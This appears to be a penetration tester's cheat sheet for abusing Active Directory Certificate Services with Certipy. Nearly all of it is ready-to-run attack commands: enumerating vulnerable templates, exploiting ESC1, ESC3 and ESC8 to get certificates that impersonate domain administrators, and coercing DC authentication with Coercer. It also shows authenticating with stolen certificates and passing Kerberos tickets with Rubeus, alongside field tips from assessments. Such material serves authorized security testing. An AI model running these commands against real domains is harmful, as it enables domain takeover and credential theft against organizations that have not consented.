#
certipy.py
#
Install (potential) pre-reqs
TIP
On one assessment I didn't have Internet access on my Kali box, and the domain environment required LDAP channel binding and so Certipy threw this when I tried to enumerate the ADCS environment:
To use LDAP channel binding, install the patched ldap3 module: pip3 install git+https://github.com/ly4k/ldap3")
Exception: To use LDAP channel binding, install the patched ldap3 module: pip3 install git+https://github.com/ly4k/ldap3So back at my home machine I did this:
pip3 download git+https://github.com/ly4k/ldap3 --no-depsThen I sneakernet'd the file over to my Kali box through a RMM tool, and then did:
pip3 install ldap3.zipThen I was good to go!
#
Find all certs
certipy find -u user@domain.com -p '' -debug- Hint: use
-scheme ldapif you get a bunch of annoying ldap errors!)
#
Find all VULNERABLE certs
certipy find -vulnerable -u user@domain.com -p '' -debug- Hint: use
-scheme ldapif you get a bunch of annoying ldap errors!)
#
Abuse ESC1
sudo certipy req -username lowpriv@domain.com -password 'winter2021' -ca CA-01 -target vulnerableCA.domain.com -template 'vuln-template' -upn da-i-want-to-impersonate@domain.com -dns fqdn-of-a-dc.domain.com -key-size 4096
#
Auth with the cert you just got
certipy auth -pfx administrator.pfx -dc-ip 172.16.16.16TIP
I was on a test recently where once I got to the auth phase, Certipy complained of Object SID mismatch between certificate and user. Thanks to this tweet, I learned that when making the req, include -sid XXX, then do auth again and you should be good to go!
#
Abuse ESC3
Request a certificate for yourself:
certipy req -username user@domain.com -p 'YOURPASS' -ca NAME-OF-CA-1 -target caserver.domain.com -template VULNERABLE-TEMPLATE Request cert on behalf of a domain admin:
certipy req -username user@domain.com -p 'YOURPASS' -ca NAME-OF-CA-1 -target caserver.domain.com -template VULNERABLE-TEMPLATE -on-behalf-of 'DOMAIN\some-domain-admin' -pfx user.pfx
#
Abuse ESC8 (DC example)
certipy relay -target vulnca.domain.com -template DomainController [or KerberosAuthentication]
#
Coerce auth
sudo python3 Coercer.py coerce -u lowpriv -p 'Winter2024!' -t ip.of.a.dc -l my.attacking.ip.addy
#
Abuse the cert
certipy auth -pfx blah.pfx -domain domain.com
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
rubeus.exe ptt /ticket:THE-PTDC01-TGT-YOU-COPIED-TO-YOUR-CLIPBOARD-EARLIERTIP
Note: in the asktgt part above, if you've stolen a machine hash then you should make the user part be /user:DC01$
#
Sanity check the CA is vulnerable to ESC8 with curl!
curl -sSLkI -u 'NETBIOS-NAME-OF-DOMAIN\user:password' --ntlm 'https://name.of.the.ca/certsrv/certfnsh.asp' TIP
If you run this curl command on Windows, use double quotes! (h/t fastchar)
If you get 401 unauthorized the endpoint is likely still vulnerable. Every time I've seen this and also received a header of WWW-Authenticate: NTLM the host has been vulnerable to ESC8.
On the other hand, I believe a 403 error indicates the endpoint has been hardened and/or the attack won't work.
On a recent assessment I got 401 unauthorized but the endpoint wasn't vulnerable. So I'm still not 100% how to determine vulnerability status unless I test it manually or just do certipy find -vulnerable
Note to self: if I call this file certipy.md in the file hierarchy, Docusaurus crashes. Wassupwitdat? I raised an issue in GitHub for this.